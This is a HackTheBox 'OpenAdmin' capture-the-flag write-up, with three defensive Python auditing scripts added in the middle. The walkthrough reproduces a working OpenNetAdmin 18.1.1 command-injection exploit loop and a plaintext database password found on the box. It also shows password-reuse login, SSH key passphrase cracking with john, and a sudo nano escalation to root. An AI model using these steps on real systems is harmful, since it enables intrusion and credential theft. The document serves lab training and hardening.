HackTheBox OpenAdmin

Marius Kimmina
IT Infrastructure at scale
0x0 Introduction

The first HackTheBox machine I ever owned, featuring OpenNetAdmin and typical admin mistakes.

Openadmin Logo

0x1 Getting a Foothold

Like most people probably do, I started off the box with an nmap scan, which returned the following result:

Nmap scan report for
Host is up (0.0058s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
# Nmap done at Sat Feb  1 06:58:04 2020 -- 1 IP address (1 host up) scanned in 7.02 seconds

SSH is not all that interesting, as the attack surface there is rather low, so I decided to look at the website hosted on port 80 and found the Apache default page, just like nmap already told us, but it never hurts to look ourselves. Hoping to find other interesting endpoints on the website, I decided to run gobuster against it:

mindslave@kalibox:~$ gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-1.0.txt -u
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        10
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-1.0.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2020/02/01 07:14:34 Starting gobuster
/music (Status: 301)
/artwork (Status: 301)
2020/02/01 07:16:12 Finished

Looking at these two endpoints we see “SOLMSUSIC” and “ARCWORK”; both sites were created from some template and are filled with lorem ipsum text.

After going through these sites and not really getting a foothold on anything, I decided to run gobuster again with a different list; tbh at this point I got kinda desperate from not finding anything, so why not give it a shot.

mindslave@kalibox:~/hackthebox/OpenAdmin$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u 10.1
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2020/02/01 10:12:08 Starting gobuster
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/artwork (Status: 301)
/music (Status: 301)
/server-status (Status: 403)
/sierra (Status: 301)
2020/02/01 10:12:25 Finished

This time we found /sierra and /ona, so there is new hope (and this time gobuster also informed me about the .htaccess). On /sierra we also find a lot of lorem ipsum text, but the /ona endpoint proved to be very interesting because it showed us that OpenNetAdmin is running on the box (something I had personally never heard of before), and it also tells us that it is an outdated version of OpenNetAdmin. A Google search for ‘OpenNetAdmin 18.1.1 Exploit’ came back with an RCE as the first result.

# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage:
# Software Link:
# Version: v18.1.1
# Tested on: Linux

# Exploit Title: OpenNetAdmin v18.1.1 RCE
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage:
# Software Link:
# Version: v18.1.1
# Tested on: Linux


while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1

I copied that into a local file and we are ready to use it:

mindslave@kalibox:~/hackthebox/OpenAdmin$ ./
$ whoami

0x2 Getting the user.txt

Now this part of the box took really, and I mean really, long for me. The first useful thing I found by looking at /home is that there are two users, jimmy and joanna. From looking at /etc/passwd we could also learn that jimmy is the admin for the Apache server:

/etc/apache2/sites-available/openadmin.conf:    ServerAdmin jimmy@openadmin.htb

And I also found out that you can log into /ona with admin:admin as the default creds, which, of course, still worked:

/opt/ona/docs/INSTALL:8. You can log in as "admin" with a password of "admin"

And I also found these database credentials:


$ona_contexts=array (
  'DEFAULT' =>
  array (
    'databases' =>
    array (
      0 =>
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
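The database settings above are a plaintext password sitting in a PHP array that the web server user can read. As an added example (not code from the box, from OpenNetAdmin or from the writeup), here is a small scanner that walks a directory tree, pulls out key/value pairs whose key looks like a secret (PHP `'key' => 'value'` entries in the shape shown above, shell/INI `key=value`, YAML `key: value`) and records whether each file is readable by users other than its owner. The sample files, file names and values are constructed; the password is a placeholder, not the box's real one.

```python
"""Scan a directory tree for credential-bearing config entries.

Added example for this writeup, not code from the box or from OpenNetAdmin.
Sample files and values below are constructed.
"""
import os
import re
import stat
import tempfile
from dataclasses import dataclass
from typing import List

# Key names that usually hold a secret ("passw(or)?d" covers both passwd and password).
SECRET_KEY_RE = re.compile(r"passw(or)?d|secret|api_?key|token", re.I)
# 'key' => 'value' (PHP arrays), key=value (shell/INI), key: value (YAML).
PAIR_RE = re.compile(
    r"""['"]?(?P<key>[A-Za-z_][\w.-]*)['"]?\s*(=>|[:=])\s*['"]?(?P<val>[^'",\s]+)"""
)

# Constructed sample in the shape of the ONA database settings shown above.
SAMPLE_PHP_CONFIG = """<?php
$ona_contexts=array (
  'DEFAULT' =>
  array (
    'databases' =>
    array (
      0 =>
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'EXAMPLE_DB_PASSWORD',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
  ),
);
"""

# Constructed sample .env file (correctly restricted to its owner).
SAMPLE_ENV = "DB_HOST=localhost\nAPI_TOKEN=example-token-123\nDEBUG=false\n"


@dataclass
class SecretHit:
    path: str
    line: int
    key: str
    value_preview: str   # masked so the report itself does not leak the secret
    world_readable: bool


def _mask(value: str) -> str:
    return value[:2] + "*" * max(len(value) - 2, 3)


def scan_tree(root: str) -> List[SecretHit]:
    """Return every secret-looking key/value pair found under root."""
    hits: List[SecretHit] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            world = bool(os.stat(path).st_mode & stat.S_IROTH)
            with open(path, "r", errors="ignore") as fh:
                for lineno, text in enumerate(fh, start=1):
                    for m in PAIR_RE.finditer(text):
                        if SECRET_KEY_RE.search(m.group("key")):
                            hits.append(SecretHit(path, lineno, m.group("key"),
                                                  _mask(m.group("val")), world))
    return hits


def make_sample_tree() -> str:
    """Write the constructed samples into a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="cfgscan-")
    php = os.path.join(root, "sample_database_settings.php")  # constructed name
    env = os.path.join(root, ".env")
    with open(php, "w") as fh:
        fh.write(SAMPLE_PHP_CONFIG)
    with open(env, "w") as fh:
        fh.write(SAMPLE_ENV)
    os.chmod(php, 0o644)   # readable by every local user: the finding we want flagged
    os.chmod(env, 0o600)
    return root


if __name__ == "__main__":
    for hit in scan_tree(make_sample_tree()):
        flag = "WORLD-READABLE" if hit.world_readable else "owner-only"
        print(f"{hit.path}:{hit.line} {hit.key}={hit.value_preview} [{flag}]")
```

Run it against a web root or `/opt` and the world-readable hits are the ones worth fixing first: tighten the file mode, or move the secret out of the web-readable tree entirely.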

And of course jimmy reused this database password for his user account, which means we could now log in as jimmy:

mindslave@kalibox:~$ ssh jimmy@
jimmy@'s password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:
 * Management:
 * Support:

  System information as of Fri Feb  7 05:41:26 UTC 2020

  System load:  0.01              Processes:             146
  Usage of /:   49.6% of 7.81GB   Users logged in:       2
  Memory usage: 22%               IP address for ens160:
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:

41 packages can be updated.
12 updates are security updates.

Failed to connect to Check your Internet connection or proxy settings

Last login: Fri Feb  7 05:39:24 2020 from

Now as jimmy we want to find out which files belong to us, and since all the interesting stuff seems to be in /var we do:

find /var -user jimmy

which reveals:


main.php looked extremely interesting:

<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); };
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session

This file is trying to output joanna’s SSH key, which we would obviously be interested in. Running it with a simple “php main.php” we just get a permission denied, though. I then tried to access these files via the browser but could not find them there either, which after a while got me thinking that they might be running on a different port:

(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0*               LISTEN      -
tcp        0      0*               LISTEN      -
tcp        0      0 *               LISTEN      -
tcp        0      0    *               LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
udp        0      0 *                           -

Which turned out to be correct: the /internal pages are running on port 52846, and a simple curl gave us the SSH key:

jimmy@openadmin:/var/www/internal$ curl localhost:52846/main.php
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session

Now before we can use this to connect as joanna we have to find the passphrase of the key, so let's ask our friend John. First convert the file into a john-readable format:

/usr/share/john/ id_rsa > johnfile.txt

Now we can use john to recover the password from johnfile.txt:

mindslave@kalibox:~/hackthebox/OpenAdmin/ssh$ john --wordlist=/usr/share/wordlists/rockyou.txt johnfile.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas      (id_rsa)
Warning: Only 2 candidates left, minimum 8 needed for performance.
1g 0:00:00:02 DONE (2020-02-07 08:27) 0.3745g/s 5371Kp/s 5371Kc/s 5371KC/sa6_123..*7¡Vamos!
Session completed

and we found the password: “bloodninjas”. This enabled us to log in as joanna and gave us the user flag for this box:

joanna@openadmin:~$ ls
joanna@openadmin:~$ cat user.txt
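Why did john get through that key in two seconds? The key served by main.php is a legacy PEM key (“Proc-Type: 4,ENCRYPTED” plus a “DEK-Info” line), and in that format the cipher key is derived from the passphrase with a single MD5 round, which is exactly what john's “KDF/cipher ... is 0” and “iteration count ... is 1” cost lines are reporting. The newer openssh-key-v1 container instead names its cipher and KDF inside the base64 body and stretches the passphrase with bcrypt. As an added example (not code from the writeup, the box or John the Ripper), here is a checker that parses both containers and flags keys whose passphrase is missing or cheaply stretched. The key samples are constructed; the `build_openssh_key` helper only builds the leading fields of the container that the check needs.

```python
"""Classify an SSH private key by how (and whether) its passphrase protects it.

Added example for this writeup, not code from the box or from John the Ripper.
Samples are constructed: the legacy PEM header mirrors the curl output above
with a placeholder body, and the openssh-key-v1 samples are built in code.
"""
import base64
import re
import struct
from dataclasses import dataclass

LEGACY_PEM_KEY = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

PLACEHOLDERBODY
-----END RSA PRIVATE KEY-----
"""

ADVICE = "re-encrypt with: ssh-keygen -p -o -a 100 -f <keyfile>"
MAGIC = b"openssh-key-v1\x00"


@dataclass
class KeyAssessment:
    container: str    # "legacy-pem" or "openssh-key-v1"
    encrypted: bool
    cipher: str
    kdf: str          # "md5x1" for encrypted legacy PEM, else "none" or "bcrypt"
    rounds: int
    weak: bool
    advice: str


def _ssh_string(data: bytes) -> bytes:
    return struct.pack(">I", len(data)) + data


def _read_string(blob: bytes, off: int):
    (n,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + n], off + 4 + n


def build_openssh_key(cipher: bytes, kdf: bytes, rounds: int = 0) -> str:
    """Build the leading fields of an openssh-key-v1 container (constructed sample)."""
    kdfopts = b""
    if kdf == b"bcrypt":
        kdfopts = _ssh_string(b"\x00" * 16) + struct.pack(">I", rounds)  # salt, rounds
    blob = (MAGIC + _ssh_string(cipher) + _ssh_string(kdf)
            + _ssh_string(kdfopts) + struct.pack(">I", 1))
    body = base64.b64encode(blob).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"


def assess_private_key(text: str, min_rounds: int = 16) -> KeyAssessment:
    lines = [ln.strip() for ln in text.strip().splitlines()]
    header = lines[0]
    if header == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(MAGIC):
            raise ValueError("not an openssh-key-v1 container")
        cipher, off = _read_string(blob, len(MAGIC))
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        rounds = 0
        if kdf == b"bcrypt":
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        encrypted = cipher != b"none"
        weak = not encrypted or kdf != b"bcrypt" or rounds < min_rounds
        return KeyAssessment("openssh-key-v1", encrypted, cipher.decode(), kdf.decode(),
                             rounds, weak, ADVICE if weak else "")
    if re.fullmatch(r"-----BEGIN (RSA|DSA|EC) PRIVATE KEY-----", header):
        encrypted = "Proc-Type: 4,ENCRYPTED" in lines
        cipher = "none"
        for ln in lines:
            if ln.startswith("DEK-Info:"):
                cipher = ln.split(":", 1)[1].strip().split(",")[0]
        # Legacy PEM uses EVP_BytesToKey: one MD5 pass over passphrase and salt
        # with no tunable cost, so offline guessing is cheap. Always flagged.
        return KeyAssessment("legacy-pem", encrypted, cipher,
                             "md5x1" if encrypted else "none", 1 if encrypted else 0,
                             True, ADVICE)
    raise ValueError("unrecognised private key container")


if __name__ == "__main__":
    for label, key in [("legacy", LEGACY_PEM_KEY),
                       ("openssh-bcrypt", build_openssh_key(b"aes256-ctr", b"bcrypt", 100)),
                       ("openssh-plain", build_openssh_key(b"none", b"none"))]:
        print(label, assess_private_key(key))
```

The advice string is the standard fix: `ssh-keygen -p -o -a 100` rewrites the key into the openssh-key-v1 container with 100 bcrypt rounds, so each passphrase guess costs far more than one MD5 call. A weak passphrase like the one here would still fall eventually, which is why the passphrase itself also matters.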

0x3 Getting the root.txt

This was actually easier than getting the user. Once you are logged in as joanna, do:

joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass,

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv

You can open /opt/priv with nano as root without getting prompted for a password. Once you have nano open on that file, you can instruct nano to read /root/root.txt, which, since it runs as root, it will do without complaint.
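The rule behind this, “(ALL) NOPASSWD: /bin/nano /opt/priv”, is the classic sudoers mistake: the argument in the rule does not limit what an editor can open or save once it is running as root. As an added example (not code from the writeup, the box or sudo), here is a small sudoers audit that parses rules in the format `sudo -l` shows and flags passwordless or editor/shell entries that run as root. The sample sudoers text is constructed (only the joanna line mirrors the box), and the two binary lists are illustrative, not exhaustive.

```python
"""Audit sudoers rules for root access via editors, shells or unrestricted ALL.

Added example for this writeup, not code from the box or from sudo. The
sample sudoers text and the binary lists are constructed and illustrative.
"""
import re
from dataclasses import dataclass
from typing import Iterator, List, Set, Tuple

# Editors and file utilities: as root they read or write any path, whatever
# argument the rule names.
FILE_ACCESS_BINARIES = {"nano", "vi", "vim", "less", "more", "tee", "cp", "mv",
                        "dd", "find", "awk", "sed"}
# Interpreters and shells: as root they are simply a root shell.
SHELL_BINARIES = {"bash", "sh", "dash", "zsh", "python", "python3", "perl", "env"}
TAGS = ("NOPASSWD", "PASSWD", "SETENV", "NOSETENV", "NOEXEC", "EXEC",
        "MAIL", "NOMAIL", "LOG_INPUT", "NOLOG_INPUT", "LOG_OUTPUT", "NOLOG_OUTPUT")

# user  host=(runas) [TAG:] command, command ...
RULE_RE = re.compile(
    r"^(?P<who>[%\w.+-]+)\s+(?P<host>[^=\s]+)\s*=\s*(\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)

SAMPLE_SUDOERS = """\
# constructed sample, not the box's real /etc/sudoers
Defaults        env_reset, mail_badpass
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
joanna  ALL=(ALL) NOPASSWD: /bin/nano /opt/priv
backup  ALL=(root) NOPASSWD: /usr/bin/rsync -a /srv/data/ /mnt/backup/
ops     ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart nginx
"""


@dataclass
class Finding:
    user: str
    runas: str
    command: str
    nopasswd: bool
    reason: str


def _commands(cmds: str) -> Iterator[Tuple[Set[str], str]]:
    """Split a comma-separated command list into (tags, command) pairs."""
    for spec in cmds.split(","):
        spec, tags = spec.strip(), set()
        while True:
            m = re.match(r"^(%s):\s*" % "|".join(TAGS), spec)
            if not m:
                break
            tags.add(m.group(1))
            spec = spec[m.end():]
        if spec:
            yield tags, spec


def audit_sudoers(text: str) -> List[Finding]:
    """Return the rules that give a non-root user root-level file or shell access."""
    findings: List[Finding] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "Cmnd_Alias", "User_Alias",
                                        "Host_Alias", "Runas_Alias")):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        user = m.group("who")
        runas = m.group("runas") or "root"   # sudo's runas default is root
        if user == "root" or runas.split(":")[0] not in ("ALL", "root"):
            continue
        for tags, cmd in _commands(m.group("cmds")):
            nopasswd = "NOPASSWD" in tags
            base = cmd.split()[0].rsplit("/", 1)[-1]
            reason = ""
            if cmd == "ALL" and nopasswd:
                reason = "unrestricted root with no password"
            elif base in SHELL_BINARIES:
                reason = f"{base} gives an interactive root shell"
            elif base in FILE_ACCESS_BINARIES:
                reason = f"{base} as root can read or write any file, not just the one in the rule"
            if reason:
                findings.append(Finding(user, runas, cmd, nopasswd, reason))
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        tag = "NOPASSWD" if f.nopasswd else "password"
        print(f"{f.user} -> ({f.runas}) {f.command} [{tag}]: {f.reason}")
```

Point it at `/etc/sudoers` and the files under `/etc/sudoers.d/`; the rsync and systemctl lines in the sample pass only because they are not in the illustrative lists, so extend those lists with whatever your own baseline considers a file-access or shell-capable binary.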


And that is it. Instead of opening root.txt you could also edit /etc/passwd or the sudoers file to actually become root. At this point we have owned the box. This was my first box on HTB and it won’t be the last!